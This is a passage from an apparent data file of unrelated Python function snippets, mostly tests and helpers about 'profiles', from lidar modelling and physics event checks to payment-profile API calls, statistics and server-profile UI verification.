Online'],rb_spec['WV Offline'], \\\n# abs_spec['WV Online'],abs_spec['WV Offline'],dr, \\\n# inu0['WV Online'],inu0['WV Offline'],GainRatio=xK[1])\n\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)\n \n# O2Model = OxygenProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['O2'],\n# Trx['O2 Online'], Trx['O2 Offline'], \\\n# rb_spec['O2 Online'],rb_spec['O2 Offline'], \\\n# abs_spec['O2 Online'],abs_spec['O2 Offline'],dr, \\\n# inu0['O2 Online'],inu0['O2 Offline'],GainRatio=xK[2])\n \n return HSRL_mol, HSRL_comb, WV_on, WV_off, O2_on, O2_off", "def test_ML_check_profile_epem_ttx(self):\n\n self.setup_logFile_for_logger('madgraph.check_cmd')\n try:\n cmd = os.getcwd()\n self.do('import model loop_sm')\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n \n # Make sure it works for an initial run\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=3)\n\n # Now for a Reuse-run\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n 
self.setup_logFile_for_logger('madgraph.check_cmd')\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=11)\n except:\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n raise\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)", "def check_profile(args):\n with_dataset(args, Dataset._check_profile)", "def test_user_profiles(self):\n\n result = self.client.get(\"/profile/1\")\n self.assertIn(b'In house:',result.data)", "def test_validate_payment_profile(self):\n self.cim.validate_payment_profile(\n customer_profile_id=u\"222\",\n customer_payment_profile_id=u\"444\",\n customer_address_id=u\"555\",\n )", "def verify_output(output_probs):\n with open (LOCAL_ROOT+LOCAL_IMAGE_LIST_PATH,'r') as f:\n gts = json.load(f)\n\n scores = []\n labels = []\n for k in output_probs:\n #import pdb;pdb.set_trace()\n if k in gts:\n scores.append(output_probs[k])\n # 43 is the index of Live/Spoof label\n labels.append(gts[k][43])\n\n fpr_list = [0.01, 0.005, 0.001]\n threshold_list = get_thresholdtable_from_fpr(scores,labels, fpr_list)\n tpr_list = get_tpr_from_threshold(scores,labels, threshold_list)\n \n # Show the result into score_path/score.txt \n logging.info('TPR@FPR=10E-3: {}\\n'.format(tpr_list[0]))\n logging.info('TPR@FPR=5E-3: {}\\n'.format(tpr_list[1]))\n logging.info('TPR@FPR=10E-4: {}\\n'.format(tpr_list[2]))\n\n logging.info(\"Done\")", "def test_profile_info(self):\n\n print '\\nIn test_profile_info...'\n file_names = glob.glob(self.input_dir+'dataset_*.txt')\n for err in [True,False]:\n for file_name in file_names:\n print '\\t%s, err=%s ='%(file_name,str(err)),\n description = file_name.split('_')[-1].split('.')[0]\n executable = lambda: \\\n profile_info.main(io.load_dataset(file_name),err=err)\n\n # If good, then profile_info.main should produce a valid df\n if '_good' in file_name:\n try:\n df = executable()\n qc.validate_profile_info(df)\n out_file = self.output_dir+\\\n 'profile_info_%s_err_%s.txt'%(description,str(err))\n io.write(df,out_file)\n io.load_profile_info(out_file)\n print 'good.'\n except:\n print 'bad (ERROR).'\n raise\n\n # If bad, then profile_info.main should raise SortSeqError\n elif '_bad' in file_name:\n try:\n self.assertRaises(SortSeqError,executable)\n print 'badtype.'\n except:\n print 'good (ERROR).'\n raise\n\n # There are no other options\n else:\n raise SortSeqError('Unrecognized class of file_name.')", "def generate_testcase(self, outfile, reg):\n \"\"\" testcase for the given register \"\"\"\n pass", "def test_output_set_output_flag_for_property(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", ArgoQcFlag.GOOD)\n flags = 
output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags == ArgoQcFlag.GOOD.value)", "def test_output_set_output_flag_for_property_where(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", ArgoQcFlag.PROBABLY_GOOD, where=slice(None, 2))\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags[:2] == ArgoQcFlag.PROBABLY_GOOD.value)\n assert np.all(flags[2:] == ArgoQcFlag.GOOD.value)", "def test_output_set_output_flag_for_property_with_precendence(profile_from_dataset, lower, higher):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", lower, where=slice(None, 2))\n output.set_output_flag_for_property(\"PRES\", higher, where=slice(None, 1))\n output.set_output_flag_for_property(\"PRES\", lower, where=slice(None, 2))\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags[:1] == higher.value)\n assert np.all(flags[1:2] == lower.value)\n assert np.all(flags[2:] == ArgoQcFlag.GOOD.value)", "def test_voigtfit():\n import os.path\n\n fn = os.path.join(os.path.dirname(__file__), \"example_civ_tau.npz\")\n taus = np.load(fn)[\"arr_0\"]\n for tau in taus:\n assert np.shape(tau) == (473,)\n prof = voigtfit.Profiles(tau,5.0103430332365999,elem=\"C\",ion=4,line=1548)\n prof.do_fit()\n (ll, tfit) = prof.get_fitted_profile()\n #Check the fit is reasonable\n assert np.sum((tfit - tau)**2/(tau+0.5)**2)/np.size(tfit) < 0.05", "def test_get_profile(self):\n self.cim.get_profile(customer_profile_id=u\"123\")", "def attest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n if type(a) != N.ndarray:\r\n a = N.array(a)\r\n x = amean(a)\r\n v = avar(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v) / float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = abetai(0.5*df,0.5,df/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n statname,t,prob)\r\n return t,prob", "def evaluate_team(self, team, mode):\n if mode == Config.RESTRICTIONS['mode']['training']:\n point_population = self.point_population_\n opponent_population = self.training_opponent_population()\n elif mode == Config.RESTRICTIONS['mode']['validation']:\n point_population = self.validation_point_population_\n opponent_population = self.validation_opponent_population_\n elif mode == Config.RESTRICTIONS['mode']['champion']:\n point_population = self.champion_population()\n opponent_population = self.champion_opponent_population()\n else:\n raise ValueError(\"Invalid mode\")\n results = []\n extra_metrics_opponents = defaultdict(list)\n match_id = 0\n\n if len(point_population) == 0:\n raise ValueError(\"Error: Nothing in point population. Probably the population size is too small.\")\n if len(opponent_population) == 0:\n raise ValueError(\"Error: Nothing in opponent population. 
Probably the population size is too small.\")\n\n if mode == Config.RESTRICTIONS['mode']['training']:\n for point, opponent in zip(point_population, opponent_population):\n match_id += 1\n result = self._play_match(team, opponent, point, mode, match_id)\n team.reset_registers()\n extra_metrics_opponents[opponent.opponent_id].append(result)\n team.results_per_points_[point.point_id_] = result\n results.append(result)\n if opponent.opponent_id == 'hall_of_fame': # since the hall of fame changes over time, it is better to dont use it to get the champion score, since you wouldnt be able to track the score improvement\n extra_metrics_opponents[opponent.__repr__()].append(result)\n \n opponent_type = 'training_opponents'\n team.fitness_ = numpy.mean(results)\n else:\n extra_metrics_points = self._initialize_extra_metrics_for_points()\n for point, opponent in zip(point_population, opponent_population):\n match_id += 1\n result = self._play_match(team, opponent, point, mode, match_id)\n team.reset_registers()\n extra_metrics_opponents[opponent.opponent_id].append(result)\n extra_metrics_points = self._update_extra_metrics_for_points(extra_metrics_points, point, result)\n if mode == Config.RESTRICTIONS['mode']['validation']:\n team.results_per_points_for_validation_[point.point_id_] = result\n results.append(result)\n elif mode == Config.RESTRICTIONS['mode']['champion']:\n if opponent.opponent_id != 'hall_of_fame': # since the hall of fame changes over time, it is better to dont use it to get the champion score, since you wouldnt be able to track the score improvement\n results.append(result)\n else:\n extra_metrics_opponents[opponent.__repr__()].append(result)\n \n opponent_type = 'opponents'\n for key in extra_metrics_points:\n for subkey in extra_metrics_points[key]:\n extra_metrics_points[key][subkey] = round_value(numpy.mean(extra_metrics_points[key][subkey]))\n team.extra_metrics_['points'] = extra_metrics_points\n if mode == Config.RESTRICTIONS['mode']['validation']:\n team.score_validation_ = round_value(numpy.mean(results))\n else:\n team.score_champion_ = round_value(numpy.mean(results))\n\n for key in extra_metrics_opponents:\n extra_metrics_opponents[key] = round_value(numpy.mean(extra_metrics_opponents[key]))\n team.extra_metrics_[opponent_type] = extra_metrics_opponents", "def test_strategy_evaluate(self, MetricClass, seed):\n m = MetricClass()\n strategy = RandomTrader(seed=seed).run(make_randomwalk(seed=seed))\n result0 = np.array(m.result(strategy)) # from metric method\n result1 = np.array(strategy.evaluate(m)) # from strategy method\n assert np.equal(result0, result1).all()", "def test_get_risk_profile_using_get(self):\n pass", "def test_get_payment_profile(self):\n self.cim.get_payment_profile(\n customer_profile_id=u\"655\",\n customer_payment_profile_id=u\"999\"\n )", "def test_positive_electrode_potential_profile(self):\n\n # TODO: add these when have averages", "def test_skos_profile(self):\n soil_oi = get_adapter(str(INPUT_DIR / \"soil-profile.skos.nt\"))\n soil_oi.prefix_map()[\"soilprofile\"] = \"http://anzsoil.org/def/au/asls/soil-profile/\"\n soil_oi.ontology_metamodel_mapper = OntologyMetadataMapper(\n [], curie_converter=soil_oi.converter\n )\n soil_oi.ontology_metamodel_mapper.use_skos_profile()\n self.assertEqual(\n [\"skos:prefLabel\"], soil_oi.ontology_metamodel_mapper.map_curie(\"rdfs:label\")\n )\n self.assertEqual(\"skos:prefLabel\", soil_oi.ontology_metamodel_mapper.label_curie())\n soil_oi.multilingual = True\n self.assertTrue(soil_oi.multilingual)\n 
soil_oi.preferred_language = \"en\"\n label_cases = [\n (\"soilprofile:voids\", \"Voids\"),\n (\"soilprofile:soil-water-regime\", \"Soil water regime\"),\n ]\n elabels = list(soil_oi.labels(soil_oi.entities()))\n for curie, label in label_cases:\n self.assertIn((curie, label), elabels)\n self.assertEqual(label, soil_oi.label(curie))\n config = SearchConfiguration(is_partial=False, properties=[SearchProperty.LABEL])\n curies = list(soil_oi.basic_search(label, config=config))\n self.assertEqual([curie], curies)\n # TODO:\n # self.assertEqual([curie], soil_oi.curies_by_label(label))\n tdef = soil_oi.definition(\"soilprofile:voids-cracks\")\n self.assertEqual(\"Planar voids\", tdef)", "def test_profile_filtering(instr_task_workbench, instr_view):\n add_profile(instr_task_workbench, 'fp5', 'Dummy.dumb.002')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp5' not in filtered\n\n add_profile(instr_task_workbench, 'fp6', 'Dummy.dumb.003')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp6' in filtered", "def test_creation_profile_4():\n assert tuple_NT[0][3] == LIST_dict[0]['blood_group'], \"blood_group of profile is not getting stored properly\"", "def test_get_hyperflex_node_profile_by_moid(self):\n pass", "def lttest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n x = mean(a)\r\n v = var(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v)/float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = betai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,min(a),max(a),\r\n statname,t,prob)\r\n return t,prob", "def test(self, test_iter, step, corpus_type, id):\n\n self.model.eval()\n stats = Statistics()\n if not os.path.exists(self.args.result_path):\n os.makedirs(self.args.result_path)\n if not os.path.exists(self.args.story_path):\n os.makedirs(self.args.story_path)\n can_path = self.args.result_path + corpus_type + '.' + id + '_step%d.candidate' % step\n gold_path = self.args.result_path + corpus_type + '.' + id + '_step%d.gold' % step\n story_path = self.args.story_path + corpus_type + '.' 
+ id + '.story'\n with open(story_path, 'w') as save_story:\n with open(can_path, 'w') as save_pred:\n with open(gold_path, 'w') as save_gold:\n with torch.no_grad():\n for batch in test_iter:\n src = batch.src\n labels = batch.labels\n segs = batch.segs\n clss = batch.clss\n mask = batch.mask\n mask_cls = batch.mask_cls\n weight = batch.weight\n index = batch.index\n\n pred = []\n\n sents_vec, sent_scores, mask, cluster_weight = self.model(src, segs, clss, mask, mask_cls)\n loss = self.loss(sent_scores, labels.float())\n weight_loss = self.weight_loss(cluster_weight, weight)\n loss = (loss * mask.float()).sum()\n total_loss = loss + weight_loss * 10\n batch_stats = Statistics(float(total_loss.cpu().data.numpy()), len(labels))\n stats.update(batch_stats)\n\n sent_scores = sent_scores + mask.float()\n sent_scores = sent_scores.cpu().data.numpy()\n cluster_weight = cluster_weight.cpu().data.numpy()\n selected_ids = np.argsort(-sent_scores, 1)\n cluster_weight = np.argsort(cluster_weight)\n # print(selected_ids)\n # selected_ids = np.sort(selected_ids,1)\n cluster_num = len(cluster_weight)\n for i, idx in enumerate(selected_ids):\n rank = np.where(cluster_weight == i)[0][0]\n\n if rank <= max(cluster_num // 6, 6):\n for j in range(5):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num // 3, 10):\n for j in range(3):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num * 2 // 3, 15):\n for j in range(2):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n else:\n sen_ind = selected_ids[i][0]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n\n gold_summary = (batch.tgt_str[0].strip())\n pred.sort(key=lambda x: x[0])\n for i in range(len(pred)):\n save_story.write(pred[i][1].strip() + '\\n')\n if i == 0:\n save_pred.write(pred[i][1].strip())\n else:\n save_pred.write('<q> ' + pred[i][1].strip())\n save_gold.write(gold_summary)\n for sent in gold_summary.split('<q>'):\n save_story.write('@highlight {}\\n'.format(sent))\n if self.args.test_txt:\n return stats\n else:\n rouges = calculate_rouge(can_path, gold_path)\n logger.info('Rouges at step %d \\n%s' % (step, rouge_results_to_str(rouges)))\n self._report_step(0, step, valid_stats=stats)\n return stats, rouges", "def test_home_by_Next_tram(self):\r\n result = self.app.get('/prochain/1/ANTIGONE/MOSSON')\r\n self.assertTrue(b'LIGNE' in result.data)\r\n self.assertTrue(b'ARRET' in result.data)\r\n self.assertTrue(b'DESTINATION' in result.data)", "def test_profile(profile_manager):\n name = 'test_profile'\n yield profile_manager.create(name)\n if profile_manager.has_profile(name):\n profile_manager.delete(name)", "def test_get_hyperflex_cluster_profile_by_moid(self):\n pass", "def test_list_profiles(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data['results']), 1)", "def create_profiles(tree, attribute, out_feature='altitude',\n filtering_rule='direct', profiles_name='unknow'):\n data = []\n description = []\n\n # Create Trees\n try:\n if isinstance(tree, trees.Tree):\n # Dual tree\n ndual = False\n thinning_tree = None\n thickening_tree = tree\n else:\n # Non dual trees\n ndual = True\n thinning_tree = tree[0]\n thickening_tree = tree[1]\n except:\n raise 
TypeError('Parameter tree_type must be a tuple or a single' \\\n ' instance of Tree, not {}'.format(tree))\n\n out_features = (out_feature, ) if isinstance(out_feature, str) else out_feature\n\n iter_count = (sum(len(x) for x in attribute.values()) * (1 + ndual) + \\\n len(attribute)) * len(out_features)\n ttq = tqdm(desc='Total', total=iter_count)\n for att, thresholds in attribute.items():\n tq = tqdm(total=(len(thresholds) * (1 + ndual) + 1) * len(out_features), desc=att)\n\n for out_feature in out_features:\n profiles = []; profiles_description = []\n of = att if out_feature == 'same' else out_feature\n\n if ndual:\n # thinning\n prof, desc = _compute_profiles(thinning_tree, att,\n thresholds[::-1], (ttq, tq), of, filtering_rule)\n profiles += prof\n profiles_description += desc\n\n # Origin\n tq.update(); ttq.update()\n profiles += [thickening_tree.reconstruct(feature=of)]\n profiles_description += [{'operation': 'copy feature {}'.format(of)}]\n\n # thickening\n prof, desc = _compute_profiles(thickening_tree, att, thresholds,\n (ttq, tq), of, filtering_rule)\n profiles += prof\n profiles_description += desc\n\n\n data += [np.stack(profiles)]\n description += [{'tree': thickening_tree.get_params(),\n 'name': profiles_name,\n 'attribute': att,\n 'profiles': profiles_description,\n 'filtering rule': filtering_rule,\n 'out feature': of}]\n tq.close()\n ttq.close()\n\n return Profiles(data, description)", "def getTestResults():", "def profile(x):\n return x", "def test_teacher_check_homework_positive():\n assert opp_teacher.check_homework(result_1)", "def ttest_review(sample_1, sample_2, alpha=.05):\n\n result = stats.ttest_ind(sample_1, sample_2)\n crit_val, p_val = result\n \n ## Creating interpretation based on p-value results.\n\n if p_val < .05:\n print(f'The feature is statistically significant with a p-value of {p_val}.')\n\n else:\n print(f'The feature is not statistically significant with a p-value of {p_val}.')\n \n return p_val", "def match(self, profile_index, nb_profile=3, show_other_skill=True):\n sample = self.df.loc[profile_index].values\n if sum(sample) == 0:\n print('This profile doesn\\'t have skill.')\n return \n score = self.df.values.dot(sample)\n score = list(score)\n self.max_index = heapq.nlargest(nb_profile+1, range(len(score)), score.__getitem__)\n print(\"input profile:\")\n self.show_skill(profile_index, show_other_skill=show_other_skill)\n print(\"matched profiles:\")\n for i in range(len(self.max_index)):\n if i == nb_profile:\n break\n if self.max_index[i] != profile_index:\n self.show_skill(self.max_index[i], show_other_skill=show_other_skill)\n return", "def _profile_function(function, profiles, game):\n return [function(game, prof) for prof in profiles] # pragma: no cover", "def test_create_profile(self):\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\"\n )\n\n def assert_other(message):\n assert 'creditCardNumber' not in message\n assert 'bankAccount' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n profile_type=u\"bank\",\n name_on_account=u\"John Doe\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\"\n )\n finally:\n del self.assert_other\n\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\",\n ship_phone=u'415-415-4154',\n ship_first_name=u'valentino'\n )\n\n payment_profiles = [\n dict(card_number=u\"43333333333\",\n 
expiration_date=u\"2010-04\"),\n dict(profile_type=u\"bank\",\n name_on_account=u\"John Doeð\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\")\n ]\n\n def assert_other(message):\n assert 'John Doe' in message\n assert '43333333333' in message\n assert 'valentino' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n payment_profiles=payment_profiles,\n ship_phone=u\"415-415-4154\",\n ship_first_name=u\"valentino\"\n )\n finally:\n del self.assert_other", "def test_if_paper_beats_rock():\n\tresult = game.evaluate_game('paper', 'rock')\n\tassert result == 'User'", "def getprofile(): # real signature unknown; restored from __doc__\n pass", "def test_add_spawning_profile_to_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n attached = False\n\n for i in intersections:\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n attached = True\n break;\n\n assert attached", "def test_compare_perforamce():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(100)\n\n # Create fake profiles library through dictionary\n faker_db_dict = session10.create_fake_library_by_dict(100)\n\n ntup, dict = session10.compare_time(faker_db, faker_db_dict)\n\n assert ntup<dict, \"Implementation is not correct\"", "def ttest():\n # open test results and perform regression analysis\n alphas = []\n betas = []\n iterations = {}\n with open(f\"Results/conclusion2.csv\") as f:\n csv_reader = csv.reader(f, delimiter=',')\n\n for run in csv_reader:\n max, max_i = get_max_run(run)\n if int(run[0]) not in iterations:\n iterations[int(run[0])] = {100 - int(run[1])-1: int(max)}\n else:\n iterations[int(run[0])][100 - int(run[1])-1] = int(max)\n\n for iteration in iterations:\n mono_levels = list(iterations[iteration].keys())\n pop_sizes = [iterations[iteration][i] for i in mono_levels]\n\n regress_result = regress(pop_sizes, mono_levels)\n alphas += [regress_result[1]]\n betas += [regress_result[0]]\n\n # plot scatter and regression line\n avg_alpha = sum(alphas)/len(alphas)\n avg_beta = sum(betas)/len(betas)\n stddev_beta = np.std(betas)\n vis.scatter_mono(iterations, avg_alpha, avg_beta)\n\n # perform t-test\n ttest_result = stats.ttest_ind(betas, [0 for i in betas], equal_var=True)\n t_stat = ttest_result[0]\n p_value = ttest_result[1]\n print(f'Results from t-test:')\n print(f'Avg beta: {avg_beta}, stddev beta: {stddev_beta}.')\n print(f't-stat: {t_stat}, p-value: {p_value}.')", "def test_with_file(filename) :\n\tif not os.path.exists(filename) :\n\t\tprint('File not exists: ' + filename)\n\t\tsys.exit(-1)\n\n\twith open(filename, 'r') as file :\n\t\tcode = file.read()\n\n\tprobabilities = shaman.Shaman.default().detect( code )\n\t\n\tfor index, (lang, prob) in enumerate(probabilities) :\n\t\tif index > 3: break\n\t\t\n\t\tprint(\"%s: %.2lf%%\" % (lang, prob))", "def test_creation_profile_1():\n assert tuple_NT[0][0] == LIST_dict[0]['name'], \"Name is not getting stored properly\"", "def bak_verify_server_profile_general_info(*profile_obj):\n selenium2lib = ui_lib.get_s2l()\n\n if not selenium2lib._is_element_present(FusionServerProfilesPage.ID_PAGE_LABEL):\n navigate()\n\n for profile in profile_obj:\n server = profile.server\n hardwaretype = profile.hardwareType\n enclosuregroup = profile.enclgroup\n\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % 
profile.name)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n BuiltIn().sleep(5) # wait for fields to load\n\n logger.info(\"Verifying server hardware for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_SERVER, server, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_SERVER)\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, server))\n selenium2lib.capture_page_screenshot()\n return False\n\n logger.info(\"Verifying server hardware type for profile %s\" % profile.name)\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_PROFILE_HARDWARE, PerfConstants.DEFAULT_SYNC_TIME, fail_if_false=False) is True:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_HARDWARE)\n if txt.find(hardwaretype) == -1:\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, hardwaretype))\n selenium2lib.capture_page_screenshot()\n return False\n else:\n logger.warn(\"Failed to wait server hardware type field display\")\n return False\n\n logger.info(\"Verifying enclosure group for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP, enclosuregroup, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP)\n logger.info(\"Enclosure group of server : %s is not as expected [%s]\" % (txt, enclosuregroup))\n selenium2lib.capture_page_screenshot()\n return False\n\n return True", "def test_zet_resultaat(self, state, zrc_client, ztc_client):\n zrc_client.auth.set_claims(\n scopes=[\n 'zds.scopes.zaken.lezen',\n 'zds.scopes.zaken.bijwerken'\n ],\n zaaktypes=[state.zaaktype['url']]\n )\n resultaattype = ztc_client.retrieve('resultaattype', uuid=RESULTAATTYPE_UUID)\n\n assert 'url' in resultaattype\n\n resultaat = zrc_client.create('resultaat', {\n 'zaak': state.zaak['url'],\n 'resultaatType': resultaattype['url'],\n 'toelichting': 'Een toelichting op wat het resultaat',\n })\n\n assert 'url' in resultaat", "def test_zet_resultaat(self, state, zrc_client, ztc_client):\n zrc_client.auth.set_claims(\n scopes=[\n 'zds.scopes.zaken.lezen',\n 'zds.scopes.zaken.bijwerken'\n ],\n zaaktypes=[state.zaaktype['url']]\n )\n resultaattype = ztc_client.retrieve('resultaattype', uuid=RESULTAATTYPE_UUID)\n\n assert 'url' in resultaattype\n\n resultaat = zrc_client.create('resultaat', {\n 'zaak': state.zaak['url'],\n 'resultaatType': resultaattype['url'],\n 'toelichting': 'Een toelichting op wat het resultaat',\n })\n\n assert 'url' in resultaat", "def profile_function(\n game, function, profiles, num_resamples, *, percentiles=None, processes=None\n):\n profiles = profiles.reshape((-1, game.num_strats))\n return game_function(\n game,\n functools.partial(_profile_function, function, profiles),\n num_resamples,\n profiles.shape[0],\n percentiles=percentiles,\n processes=processes,\n )", "def test_profile_commands(self):\n with DockerHost('host', start_calico=False) as host:\n\n host.calicoctl(\"profile add TEST_PROFILE\")\n\n json_dict = {\"id\": \"TEST_PROFILE\",\n \"inbound_rules\": [\n {\"action\": \"allow\",\n \"src_tag\": \"TEST_PROFILE\"},\n {\"action\": \"deny\"}\n ],\n \"outbound_rules\": [{\"action\": \"deny\",\n \"dst_net\": \"192.168.0.0/16\"},\n {\n \"action\": \"allow\"\n }]}\n\n update = json.dumps(json_dict)\n cmd = \"/code/dist/calicoctl profile TEST_PROFILE rule 
update\"\n host.execute(\"echo '%s' | %s\" % (update, cmd))\n\n self.assertIn('1 deny',\n host.calicoctl(\"profile TEST_PROFILE rule show\"))\n\n result = host.calicoctl(\"profile TEST_PROFILE rule json\")\n rules = json.loads(result)\n self.assertDictEqual(rules, json_dict)\n\n # Test that adding and removing a tag works.\n self.assertNotIn(\"TEST_TAG\", self.show_tag(host))\n host.calicoctl(\"profile TEST_PROFILE tag add TEST_TAG\")\n self.assertIn(\"TEST_TAG\", self.show_tag(host))\n host.calicoctl(\"profile TEST_PROFILE tag remove TEST_TAG\")\n self.assertNotIn(\"TEST_TAG\", self.show_tag(host))", "def mock_gt_single(get_mock_dicom_verify_results: dict):\n gt = get_mock_dicom_verify_results[\"ground_truth\"]\n return gt", "def test_predictor():", "def negative_test_for_check_general_session(profile_obj):\n status = True\n\n logger._log_to_console_and_log_file(\"### Testing the 'General' session ###\")\n\n # LIST_OF_TESTS specify a list of elements to be validated in the \"General\" page\n # For each element of the list, we add the following information:\n # [0] = The locator of the field that we'll input the data (e.g. FusionPage.DescriptionEditBox)\n # [1] = The input data (e.g. MyProfile, !@#%&&*, blablabla, etc...)\n # [2] = The locator of the error message (e.g. FusionPage.ErrorMessage)\n # [3] = The Message name that will be displayed at the console and logs\n for profile in profile_obj:\n LIST_OF_TESTS = [[None, \"\", FusionServerProfilesPage.ID_WARNING_FIELD_REQUIRED, \"ID_WARNING_FIELD_REQUIRED\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n 